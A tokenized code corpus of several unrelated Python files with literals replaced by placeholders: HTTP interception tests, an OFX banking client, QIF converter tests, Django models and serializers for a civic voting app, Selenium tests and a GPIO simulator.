<s> from wsgi_intercept import httplib2_intercept <EOL> from nose . tools import with_setup , raises , eq_ <EOL> from socket import gaierror <EOL> import wsgi_intercept <EOL> from wsgi_intercept import test_wsgi_app <EOL> import httplib2 <EOL> _saved_debuglevel = None <EOL> def install ( port = <NUM_LIT> ) : <EOL> _saved_debuglevel , wsgi_intercept . debuglevel = wsgi_intercept . debuglevel , <NUM_LIT:1> <EOL> httplib2_intercept . install ( ) <EOL> wsgi_intercept . add_wsgi_intercept ( '<STR_LIT>' , port , test_wsgi_app . create_fn ) <EOL> def uninstall ( ) : <EOL> wsgi_intercept . debuglevel = _saved_debuglevel <EOL> httplib2_intercept . uninstall ( ) <EOL> @ with_setup ( install , uninstall ) <EOL> def test_success ( ) : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( '<STR_LIT>' , '<STR_LIT:GET>' ) <EOL> eq_ ( content , "<STR_LIT>" ) <EOL> assert test_wsgi_app . success ( ) <EOL> @ with_setup ( install , uninstall ) <EOL> @ raises ( gaierror ) <EOL> def test_bogus_domain ( ) : <EOL> wsgi_intercept . debuglevel = <NUM_LIT:1> ; <EOL> httplib2_intercept . HTTP_WSGIInterceptorWithTimeout ( "<STR_LIT>" ) . connect ( ) <EOL> @ with_setup ( lambda : install ( <NUM_LIT> ) , uninstall ) <EOL> def test_https_success ( ) : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( '<STR_LIT>' , '<STR_LIT:GET>' ) <EOL> assert test_wsgi_app . success ( ) </s>
<s> import ofx <EOL> import urllib2 <EOL> class Client : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , debug = False ) : <EOL> """<STR_LIT>""" <EOL> self . request_msg = None <EOL> self . debug = debug <EOL> def get_fi_profile ( self , institution , <EOL> username = "<STR_LIT>" , <EOL> password = "<STR_LIT>" ) : <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . fi_profile ( institution , username , password ) <EOL> return self . _send_request ( institution . ofx_url , self . request_msg ) <EOL> def get_account_info ( self , institution , username , password ) : <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . account_info ( institution , username , password ) <EOL> return self . _send_request ( institution . ofx_url , self . request_msg ) <EOL> def get_statement ( self , account , username , password ) : <EOL> acct_type = account . get_ofx_accttype ( ) <EOL> if acct_type == "<STR_LIT>" : <EOL> return self . get_creditcard_statement ( account , username , password ) <EOL> elif acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" : <EOL> return self . get_bank_statement ( account , username , password ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % acct_type ) <EOL> def get_bank_statement ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> request = ofx . Request ( ) <EOL> try : <EOL> self . request_msg = request . bank_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> try : <EOL> self . request_msg = request . bank_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> self . request_msg = request . 
bank_stmt ( account , username , password , daysago = <NUM_LIT:30> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_creditcard_statement ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> request = ofx . Request ( ) <EOL> try : <EOL> self . request_msg = request . creditcard_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> try : <EOL> self . request_msg = request . creditcard_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> self . request_msg = request . creditcard_stmt ( account , username , password , daysago = <NUM_LIT:30> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_closing ( self , account , username , password ) : <EOL> acct_type = account . get_ofx_accttype ( ) <EOL> if acct_type == "<STR_LIT>" : <EOL> return self . get_creditcard_closing ( account , username , password ) <EOL> elif acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" : <EOL> return self . get_bank_closing ( account , username , password ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % acct_type ) <EOL> def get_bank_closing ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> acct_type = account . get_ofx_accttype ( ) <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . bank_closing ( account , username , password ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_creditcard_closing ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> request = ofx . Request ( ) <EOL> self . 
request_msg = request . creditcard_closing ( account , username , password ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_request_message ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . request_msg <EOL> def _send_request ( self , url , request_body ) : <EOL> """<STR_LIT>""" <EOL> request = urllib2 . Request ( url , request_body , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> stream = urllib2 . urlopen ( request ) <EOL> response = stream . read ( ) <EOL> stream . close ( ) <EOL> if self . debug : <EOL> print response <EOL> response = ofx . Response ( response ) <EOL> response . check_signon_status ( ) <EOL> parsed_ofx = response . as_dict ( ) <EOL> if parsed_ofx . has_key ( "<STR_LIT>" ) : <EOL> bank_status = parsed_ofx [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . _check_status ( bank_status , "<STR_LIT>" ) <EOL> elif parsed_ofx . has_key ( "<STR_LIT>" ) : <EOL> creditcard_status = parsed_ofx [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . _check_status ( creditcard_status , "<STR_LIT>" ) <EOL> elif parsed_ofx . has_key ( "<STR_LIT>" ) : <EOL> acctinfo_status = parsed_ofx [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . _check_status ( acctinfo_status , "<STR_LIT>" ) <EOL> return response <EOL> def _check_status ( self , status_block , description ) : <EOL> status = status_block . asDict ( ) <EOL> code = status . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if code is not "<STR_LIT:0>" and code is not "<STR_LIT:1>" : <EOL> severity = status . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> message = status . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> error = ofx . Error ( description , code , severity , message ) <EOL> raise error </s>
<s> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> import ofxtools <EOL> import textwrap <EOL> import unittest <EOL> from pyparsing import ParseException <EOL> from time import localtime , strftime <EOL> class QifConverterTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def test_bank_stmttype ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . accttype , "<STR_LIT>" ) <EOL> def test_ccard_stmttype ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . accttype , "<STR_LIT>" ) <EOL> def test_no_stmttype ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . accttype , "<STR_LIT>" ) <EOL> def test_no_txns ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> today = strftime ( "<STR_LIT>" , localtime ( ) ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , today ) <EOL> self . assertEqual ( converter . end_date , today ) <EOL> def test_us_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_uk_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_ambiguous_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . 
has_key ( "<STR_LIT>" ) ) <EOL> def test_mixed_us_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_mixed_uk_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_slashfree_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_unparseable_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> self . assertRaises ( ValueError , ofxtools . QifConverter , qiftext ) <EOL> def test_len_eight_no_int_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> self . assertRaises ( ValueError , ofxtools . QifConverter , qiftext ) <EOL> def test_asc_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , "<STR_LIT>" ) <EOL> self . assertEqual ( converter . end_date , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( converter . txns_by_date . keys ( ) ) , <NUM_LIT:4> ) <EOL> def test_desc_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , "<STR_LIT>" ) <EOL> self . assertEqual ( converter . end_date , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( converter . txns_by_date . 
keys ( ) ) , <NUM_LIT:4> ) <EOL> def test_mixed_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , "<STR_LIT>" ) <EOL> self . assertEqual ( converter . end_date , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( converter . txns_by_date . keys ( ) ) , <NUM_LIT:4> ) <EOL> def test_default_currency ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> ofx102 = converter . to_ofx102 ( ) <EOL> self . assertTrue ( ofx102 . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> def test_found_currency ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> ofx102 = converter . to_ofx102 ( ) <EOL> self . assertTrue ( ofx102 . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> def test_explicit_currency ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext , curdef = '<STR_LIT>' ) <EOL> ofx102 = converter . to_ofx102 ( ) <EOL> self . assertTrue ( ofx102 . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> def test_amount2 ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_bad_amount_precision ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_dash_amount ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn_list = converter . txns_by_date [ "<STR_LIT>" ] <EOL> self . 
assertEqual ( len ( txn_list ) , <NUM_LIT:1> ) <EOL> txn = txn_list [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_trailing_minus ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_n_a_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . has_key ( "<STR_LIT>" ) , False ) <EOL> def test_creditcard_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . has_key ( "<STR_LIT>" ) , False ) <EOL> def test_creditcard_stmt_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . has_key ( "<STR_LIT>" ) , False ) <EOL> def test_check_stmt_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . get ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def test_usaa_check ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . get ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEqual ( txn . get ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . 
main ( ) </s>
<s> from election_office_measure . models import CandidateCampaign <EOL> from organization . models import Organization <EOL> from position . models import PositionEntered <EOL> from rest_framework import serializers <EOL> class CandidateCampaignSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = CandidateCampaign <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class OrganizationSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Organization <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:url>' ) <EOL> class PositionSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = PositionEntered <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from django . db import models <EOL> import csv <EOL> from wevotebase . base import get_environment_variable <EOL> import wevote_functions . admin <EOL> LEGISLATORS_CURRENT_CSV_FILE = get_environment_variable ( "<STR_LIT>" ) <EOL> legislators_current_fields = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:type>" , <EOL> "<STR_LIT:state>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:url>" , <EOL> "<STR_LIT:address>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> logger = wevote_functions . admin . get_logger ( __name__ ) <EOL> class TheUnitedStatesIoLegislatorCurrent ( models . Model ) : <EOL> last_name = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> first_name = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> birthday = models . DateField ( "<STR_LIT>" , default = None , null = True , blank = True ) <EOL> gender = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT:10> ) <EOL> type = models . CharField ( "<STR_LIT:type>" , max_length = <NUM_LIT> ) <EOL> state = models . CharField ( "<STR_LIT:state>" , max_length = <NUM_LIT> ) <EOL> district = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> party = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> url = models . CharField ( "<STR_LIT:url>" , max_length = <NUM_LIT> ) <EOL> address = models . CharField ( "<STR_LIT:address>" , max_length = <NUM_LIT> ) <EOL> phone = models . 
CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> contact_form = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> rss_url = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> twitter = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> facebook = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> facebook_id = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> youtube = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> youtube_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> bioguide_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = True ) <EOL> thomas_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = True ) <EOL> opensecrets_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> lis_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> cspan_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> govtrack_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = True ) <EOL> votesmart_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> ballotpedia_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> washington_post_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True ) <EOL> icpsr_id = models . 
CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> wikipedia_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> was_processed = models . BooleanField ( verbose_name = "<STR_LIT>" , default = False , null = False , blank = False ) <EOL> def delete_all_legislator_data ( ) : <EOL> with open ( LEGISLATORS_CURRENT_CSV_FILE , '<STR_LIT>' ) as legislators_current_data : <EOL> legislators_current_data . readline ( ) <EOL> reader = csv . reader ( legislators_current_data ) <EOL> for index , legislator_row in enumerate ( reader ) : <EOL> if index > <NUM_LIT:3> : <EOL> break <EOL> legislator_entry = TheUnitedStatesIoLegislatorCurrent . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> legislator_entry . delete ( ) </s>
<s> from django . test import TestCase </s>
<s> from django . test import TestCase </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from local import * <EOL> except ImportError as e : <EOL> try : <EOL> from production_heroku import * <EOL> except ImportError as e : <EOL> pass </s>
<s> from time import time <EOL> from nose . tools import eq_ , ok_ <EOL> from selenium . webdriver import Firefox <EOL> from tests . simple_page import SimplePage <EOL> class TestCustomDriver ( object ) : <EOL> def setUp ( self ) : <EOL> self . driver = Firefox ( ) <EOL> self . driver . implicitly_wait ( <NUM_LIT:1> ) <EOL> self . page = SimplePage ( self . driver ) <EOL> self . page . open ( ) <EOL> def test_finds ( self ) : <EOL> start = time ( ) <EOL> eq_ ( len ( self . page . empty_element_list ) , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> ok_ ( time ( ) - start < <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def test_nested_finds_in_container ( self ) : <EOL> start = time ( ) <EOL> eq_ ( len ( self . page . physical_container . empty_element_list ) , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> ok_ ( time ( ) - start < <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def test_nested_finds_in_logical_container ( self ) : <EOL> start = time ( ) <EOL> eq_ ( len ( self . page . logical_container . empty_element_list ) , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> ok_ ( time ( ) - start < <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> self . driver . quit ( ) </s>
<s> from selenium . webdriver import Firefox <EOL> from selenium . webdriver . common . by import By <EOL> driver_class = Firefox <EOL> implicit_timeout = <NUM_LIT:30> <EOL> wait_timeout = <NUM_LIT:30> <EOL> default_search_type = By . ID <EOL> try : <EOL> from local_webium_settings import * <EOL> except ImportError : <EOL> pass </s>
<s> import sys <EOL> try : <EOL> import thread <EOL> except ImportError : <EOL> import _thread as thread <EOL> MIN_PIN = <NUM_LIT:0> <EOL> MAX_PIN = <NUM_LIT:16> <EOL> LABELS = "<STR_LIT>" <EOL> IN = <NUM_LIT:0> <EOL> OUT = <NUM_LIT:1> <EOL> BCM = <NUM_LIT:0> <EOL> BOARD = <NUM_LIT:1> <EOL> HIGH = <NUM_LIT:1> <EOL> LOW = <NUM_LIT:0> <EOL> def trace ( msg ) : <EOL> print ( str ( msg ) ) <EOL> def write ( msg ) : <EOL> print ( str ( msg ) ) <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> def ask ( msg = "<STR_LIT>" ) : <EOL> return input ( msg ) <EOL> else : <EOL> def ask ( msg = "<STR_LIT>" ) : <EOL> return raw_input ( msg ) <EOL> class GPIOClient : <EOL> pinmode = { } <EOL> pinstate = { } <EOL> def __init__ ( self , server = False ) : <EOL> if server : <EOL> self . controlInputs ( True ) <EOL> def setmode ( self , mode ) : <EOL> pass <EOL> def setup ( self , channel , mode ) : <EOL> self . pinmode [ channel ] = mode <EOL> if mode == IN : <EOL> self . pinstate [ channel ] = HIGH <EOL> elif mode == OUT : <EOL> self . pinstate [ channel ] = LOW <EOL> self . _show ( ) <EOL> def input ( self , channel ) : <EOL> try : <EOL> return self . pinstate [ channel ] <EOL> except KeyError : <EOL> return HIGH <EOL> def output ( self , channel , value ) : <EOL> self . pinstate [ channel ] = self . _pinValue ( value ) <EOL> self . _show ( ) <EOL> def cleanup ( self ) : <EOL> self . pinmode = { } <EOL> self . pinstate = { } <EOL> def _pinValue ( self , v ) : <EOL> if v == None or v == False or v == <NUM_LIT:0> : <EOL> return LOW <EOL> return HIGH <EOL> def _show2 ( self ) : <EOL> write ( "<STR_LIT>" + str ( self . pinmode ) ) <EOL> write ( "<STR_LIT>" + str ( self . 
pinstate ) ) <EOL> write ( "<STR_LIT>" ) <EOL> def _show ( self ) : <EOL> line = "<STR_LIT>" <EOL> for p in range ( MIN_PIN , MAX_PIN + <NUM_LIT:1> ) : <EOL> line += LABELS [ p ] <EOL> if ( p + <NUM_LIT:1> ) % <NUM_LIT:4> == <NUM_LIT:0> : <EOL> line += "<STR_LIT:U+0020>" <EOL> write ( line ) <EOL> line = "<STR_LIT>" <EOL> for p in range ( MIN_PIN , MAX_PIN + <NUM_LIT:1> ) : <EOL> try : <EOL> if self . pinmode [ p ] == IN : <EOL> line += "<STR_LIT:I>" <EOL> elif self . pinmode [ p ] == OUT : <EOL> line += "<STR_LIT:O>" <EOL> else : <EOL> line += "<STR_LIT:?>" <EOL> except KeyError : <EOL> line += "<STR_LIT:X>" <EOL> if ( p + <NUM_LIT:1> ) % <NUM_LIT:4> == <NUM_LIT:0> : <EOL> line += "<STR_LIT:U+0020>" <EOL> write ( line ) <EOL> line = "<STR_LIT>" <EOL> for p in range ( MIN_PIN , MAX_PIN + <NUM_LIT:1> ) : <EOL> try : <EOL> if self . pinstate [ p ] == <NUM_LIT:1> : <EOL> line += "<STR_LIT:1>" <EOL> elif self . pinstate [ p ] == <NUM_LIT:0> : <EOL> line += "<STR_LIT:0>" <EOL> else : <EOL> trace ( "<STR_LIT>" + str ( p ) + "<STR_LIT>" + str ( self . pinstate [ p ] ) ) <EOL> line += "<STR_LIT:?>" <EOL> except KeyError : <EOL> line += "<STR_LIT:X>" <EOL> if ( p + <NUM_LIT:1> ) % <NUM_LIT:4> == <NUM_LIT:0> : <EOL> line += "<STR_LIT:U+0020>" <EOL> write ( line ) <EOL> write ( "<STR_LIT>" ) <EOL> def changeInput ( self , channel , value ) : <EOL> if self . pinmode [ channel ] != IN : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . pinstate [ channel ] = self . _pinValue ( value ) <EOL> _serverRunning = False <EOL> _kbdThread = None <EOL> def controlInputs ( self , flag ) : <EOL> if flag and not self . _serverRunning : <EOL> self . _startServer ( ) <EOL> elif not flag and self . _serverRunning : <EOL> self . _stopServer ( ) <EOL> def _startServer ( self ) : <EOL> self . _kbdThread = thread . start_new_thread ( self . _server , ( ) ) <EOL> self . _serverRunning = True <EOL> def _stopServer ( self ) : <EOL> self . _kbdThread . stop ( ) <EOL> self . 
_kbdThread = None <EOL> self . _serverRunning = False <EOL> def _parse_pinch ( self , ch ) : <EOL> return LABELS . index ( ch ) <EOL> def _getcmd ( self ) : <EOL> while True : <EOL> cmdstr = ask ( ) <EOL> cmdstr = cmdstr . strip ( ) <EOL> if len ( cmdstr ) >= <NUM_LIT:2> : <EOL> return cmdstr <EOL> def _parsecmd ( self , cmdstr ) : <EOL> pinch = cmdstr [ <NUM_LIT:0> ] <EOL> valuech = cmdstr [ <NUM_LIT:1> ] <EOL> channel = self . _parse_pinch ( pinch ) <EOL> return channel , valuech <EOL> def _process ( self , channel , valuech ) : <EOL> if valuech == "<STR_LIT:I>" : <EOL> self . setmode ( channel , IN ) <EOL> elif valuech == "<STR_LIT:O>" : <EOL> self . setmode ( channel , OUT ) <EOL> elif valuech == "<STR_LIT:1>" : <EOL> self . changeInput ( channel , True ) <EOL> elif valuech == "<STR_LIT:0>" : <EOL> self . changeInput ( channel , False ) <EOL> def _server ( self ) : <EOL> while True : <EOL> cmdstr = self . _getcmd ( ) <EOL> channel , valuech = self . _parsecmd ( cmdstr ) <EOL> self . _process ( channel , valuech ) </s>
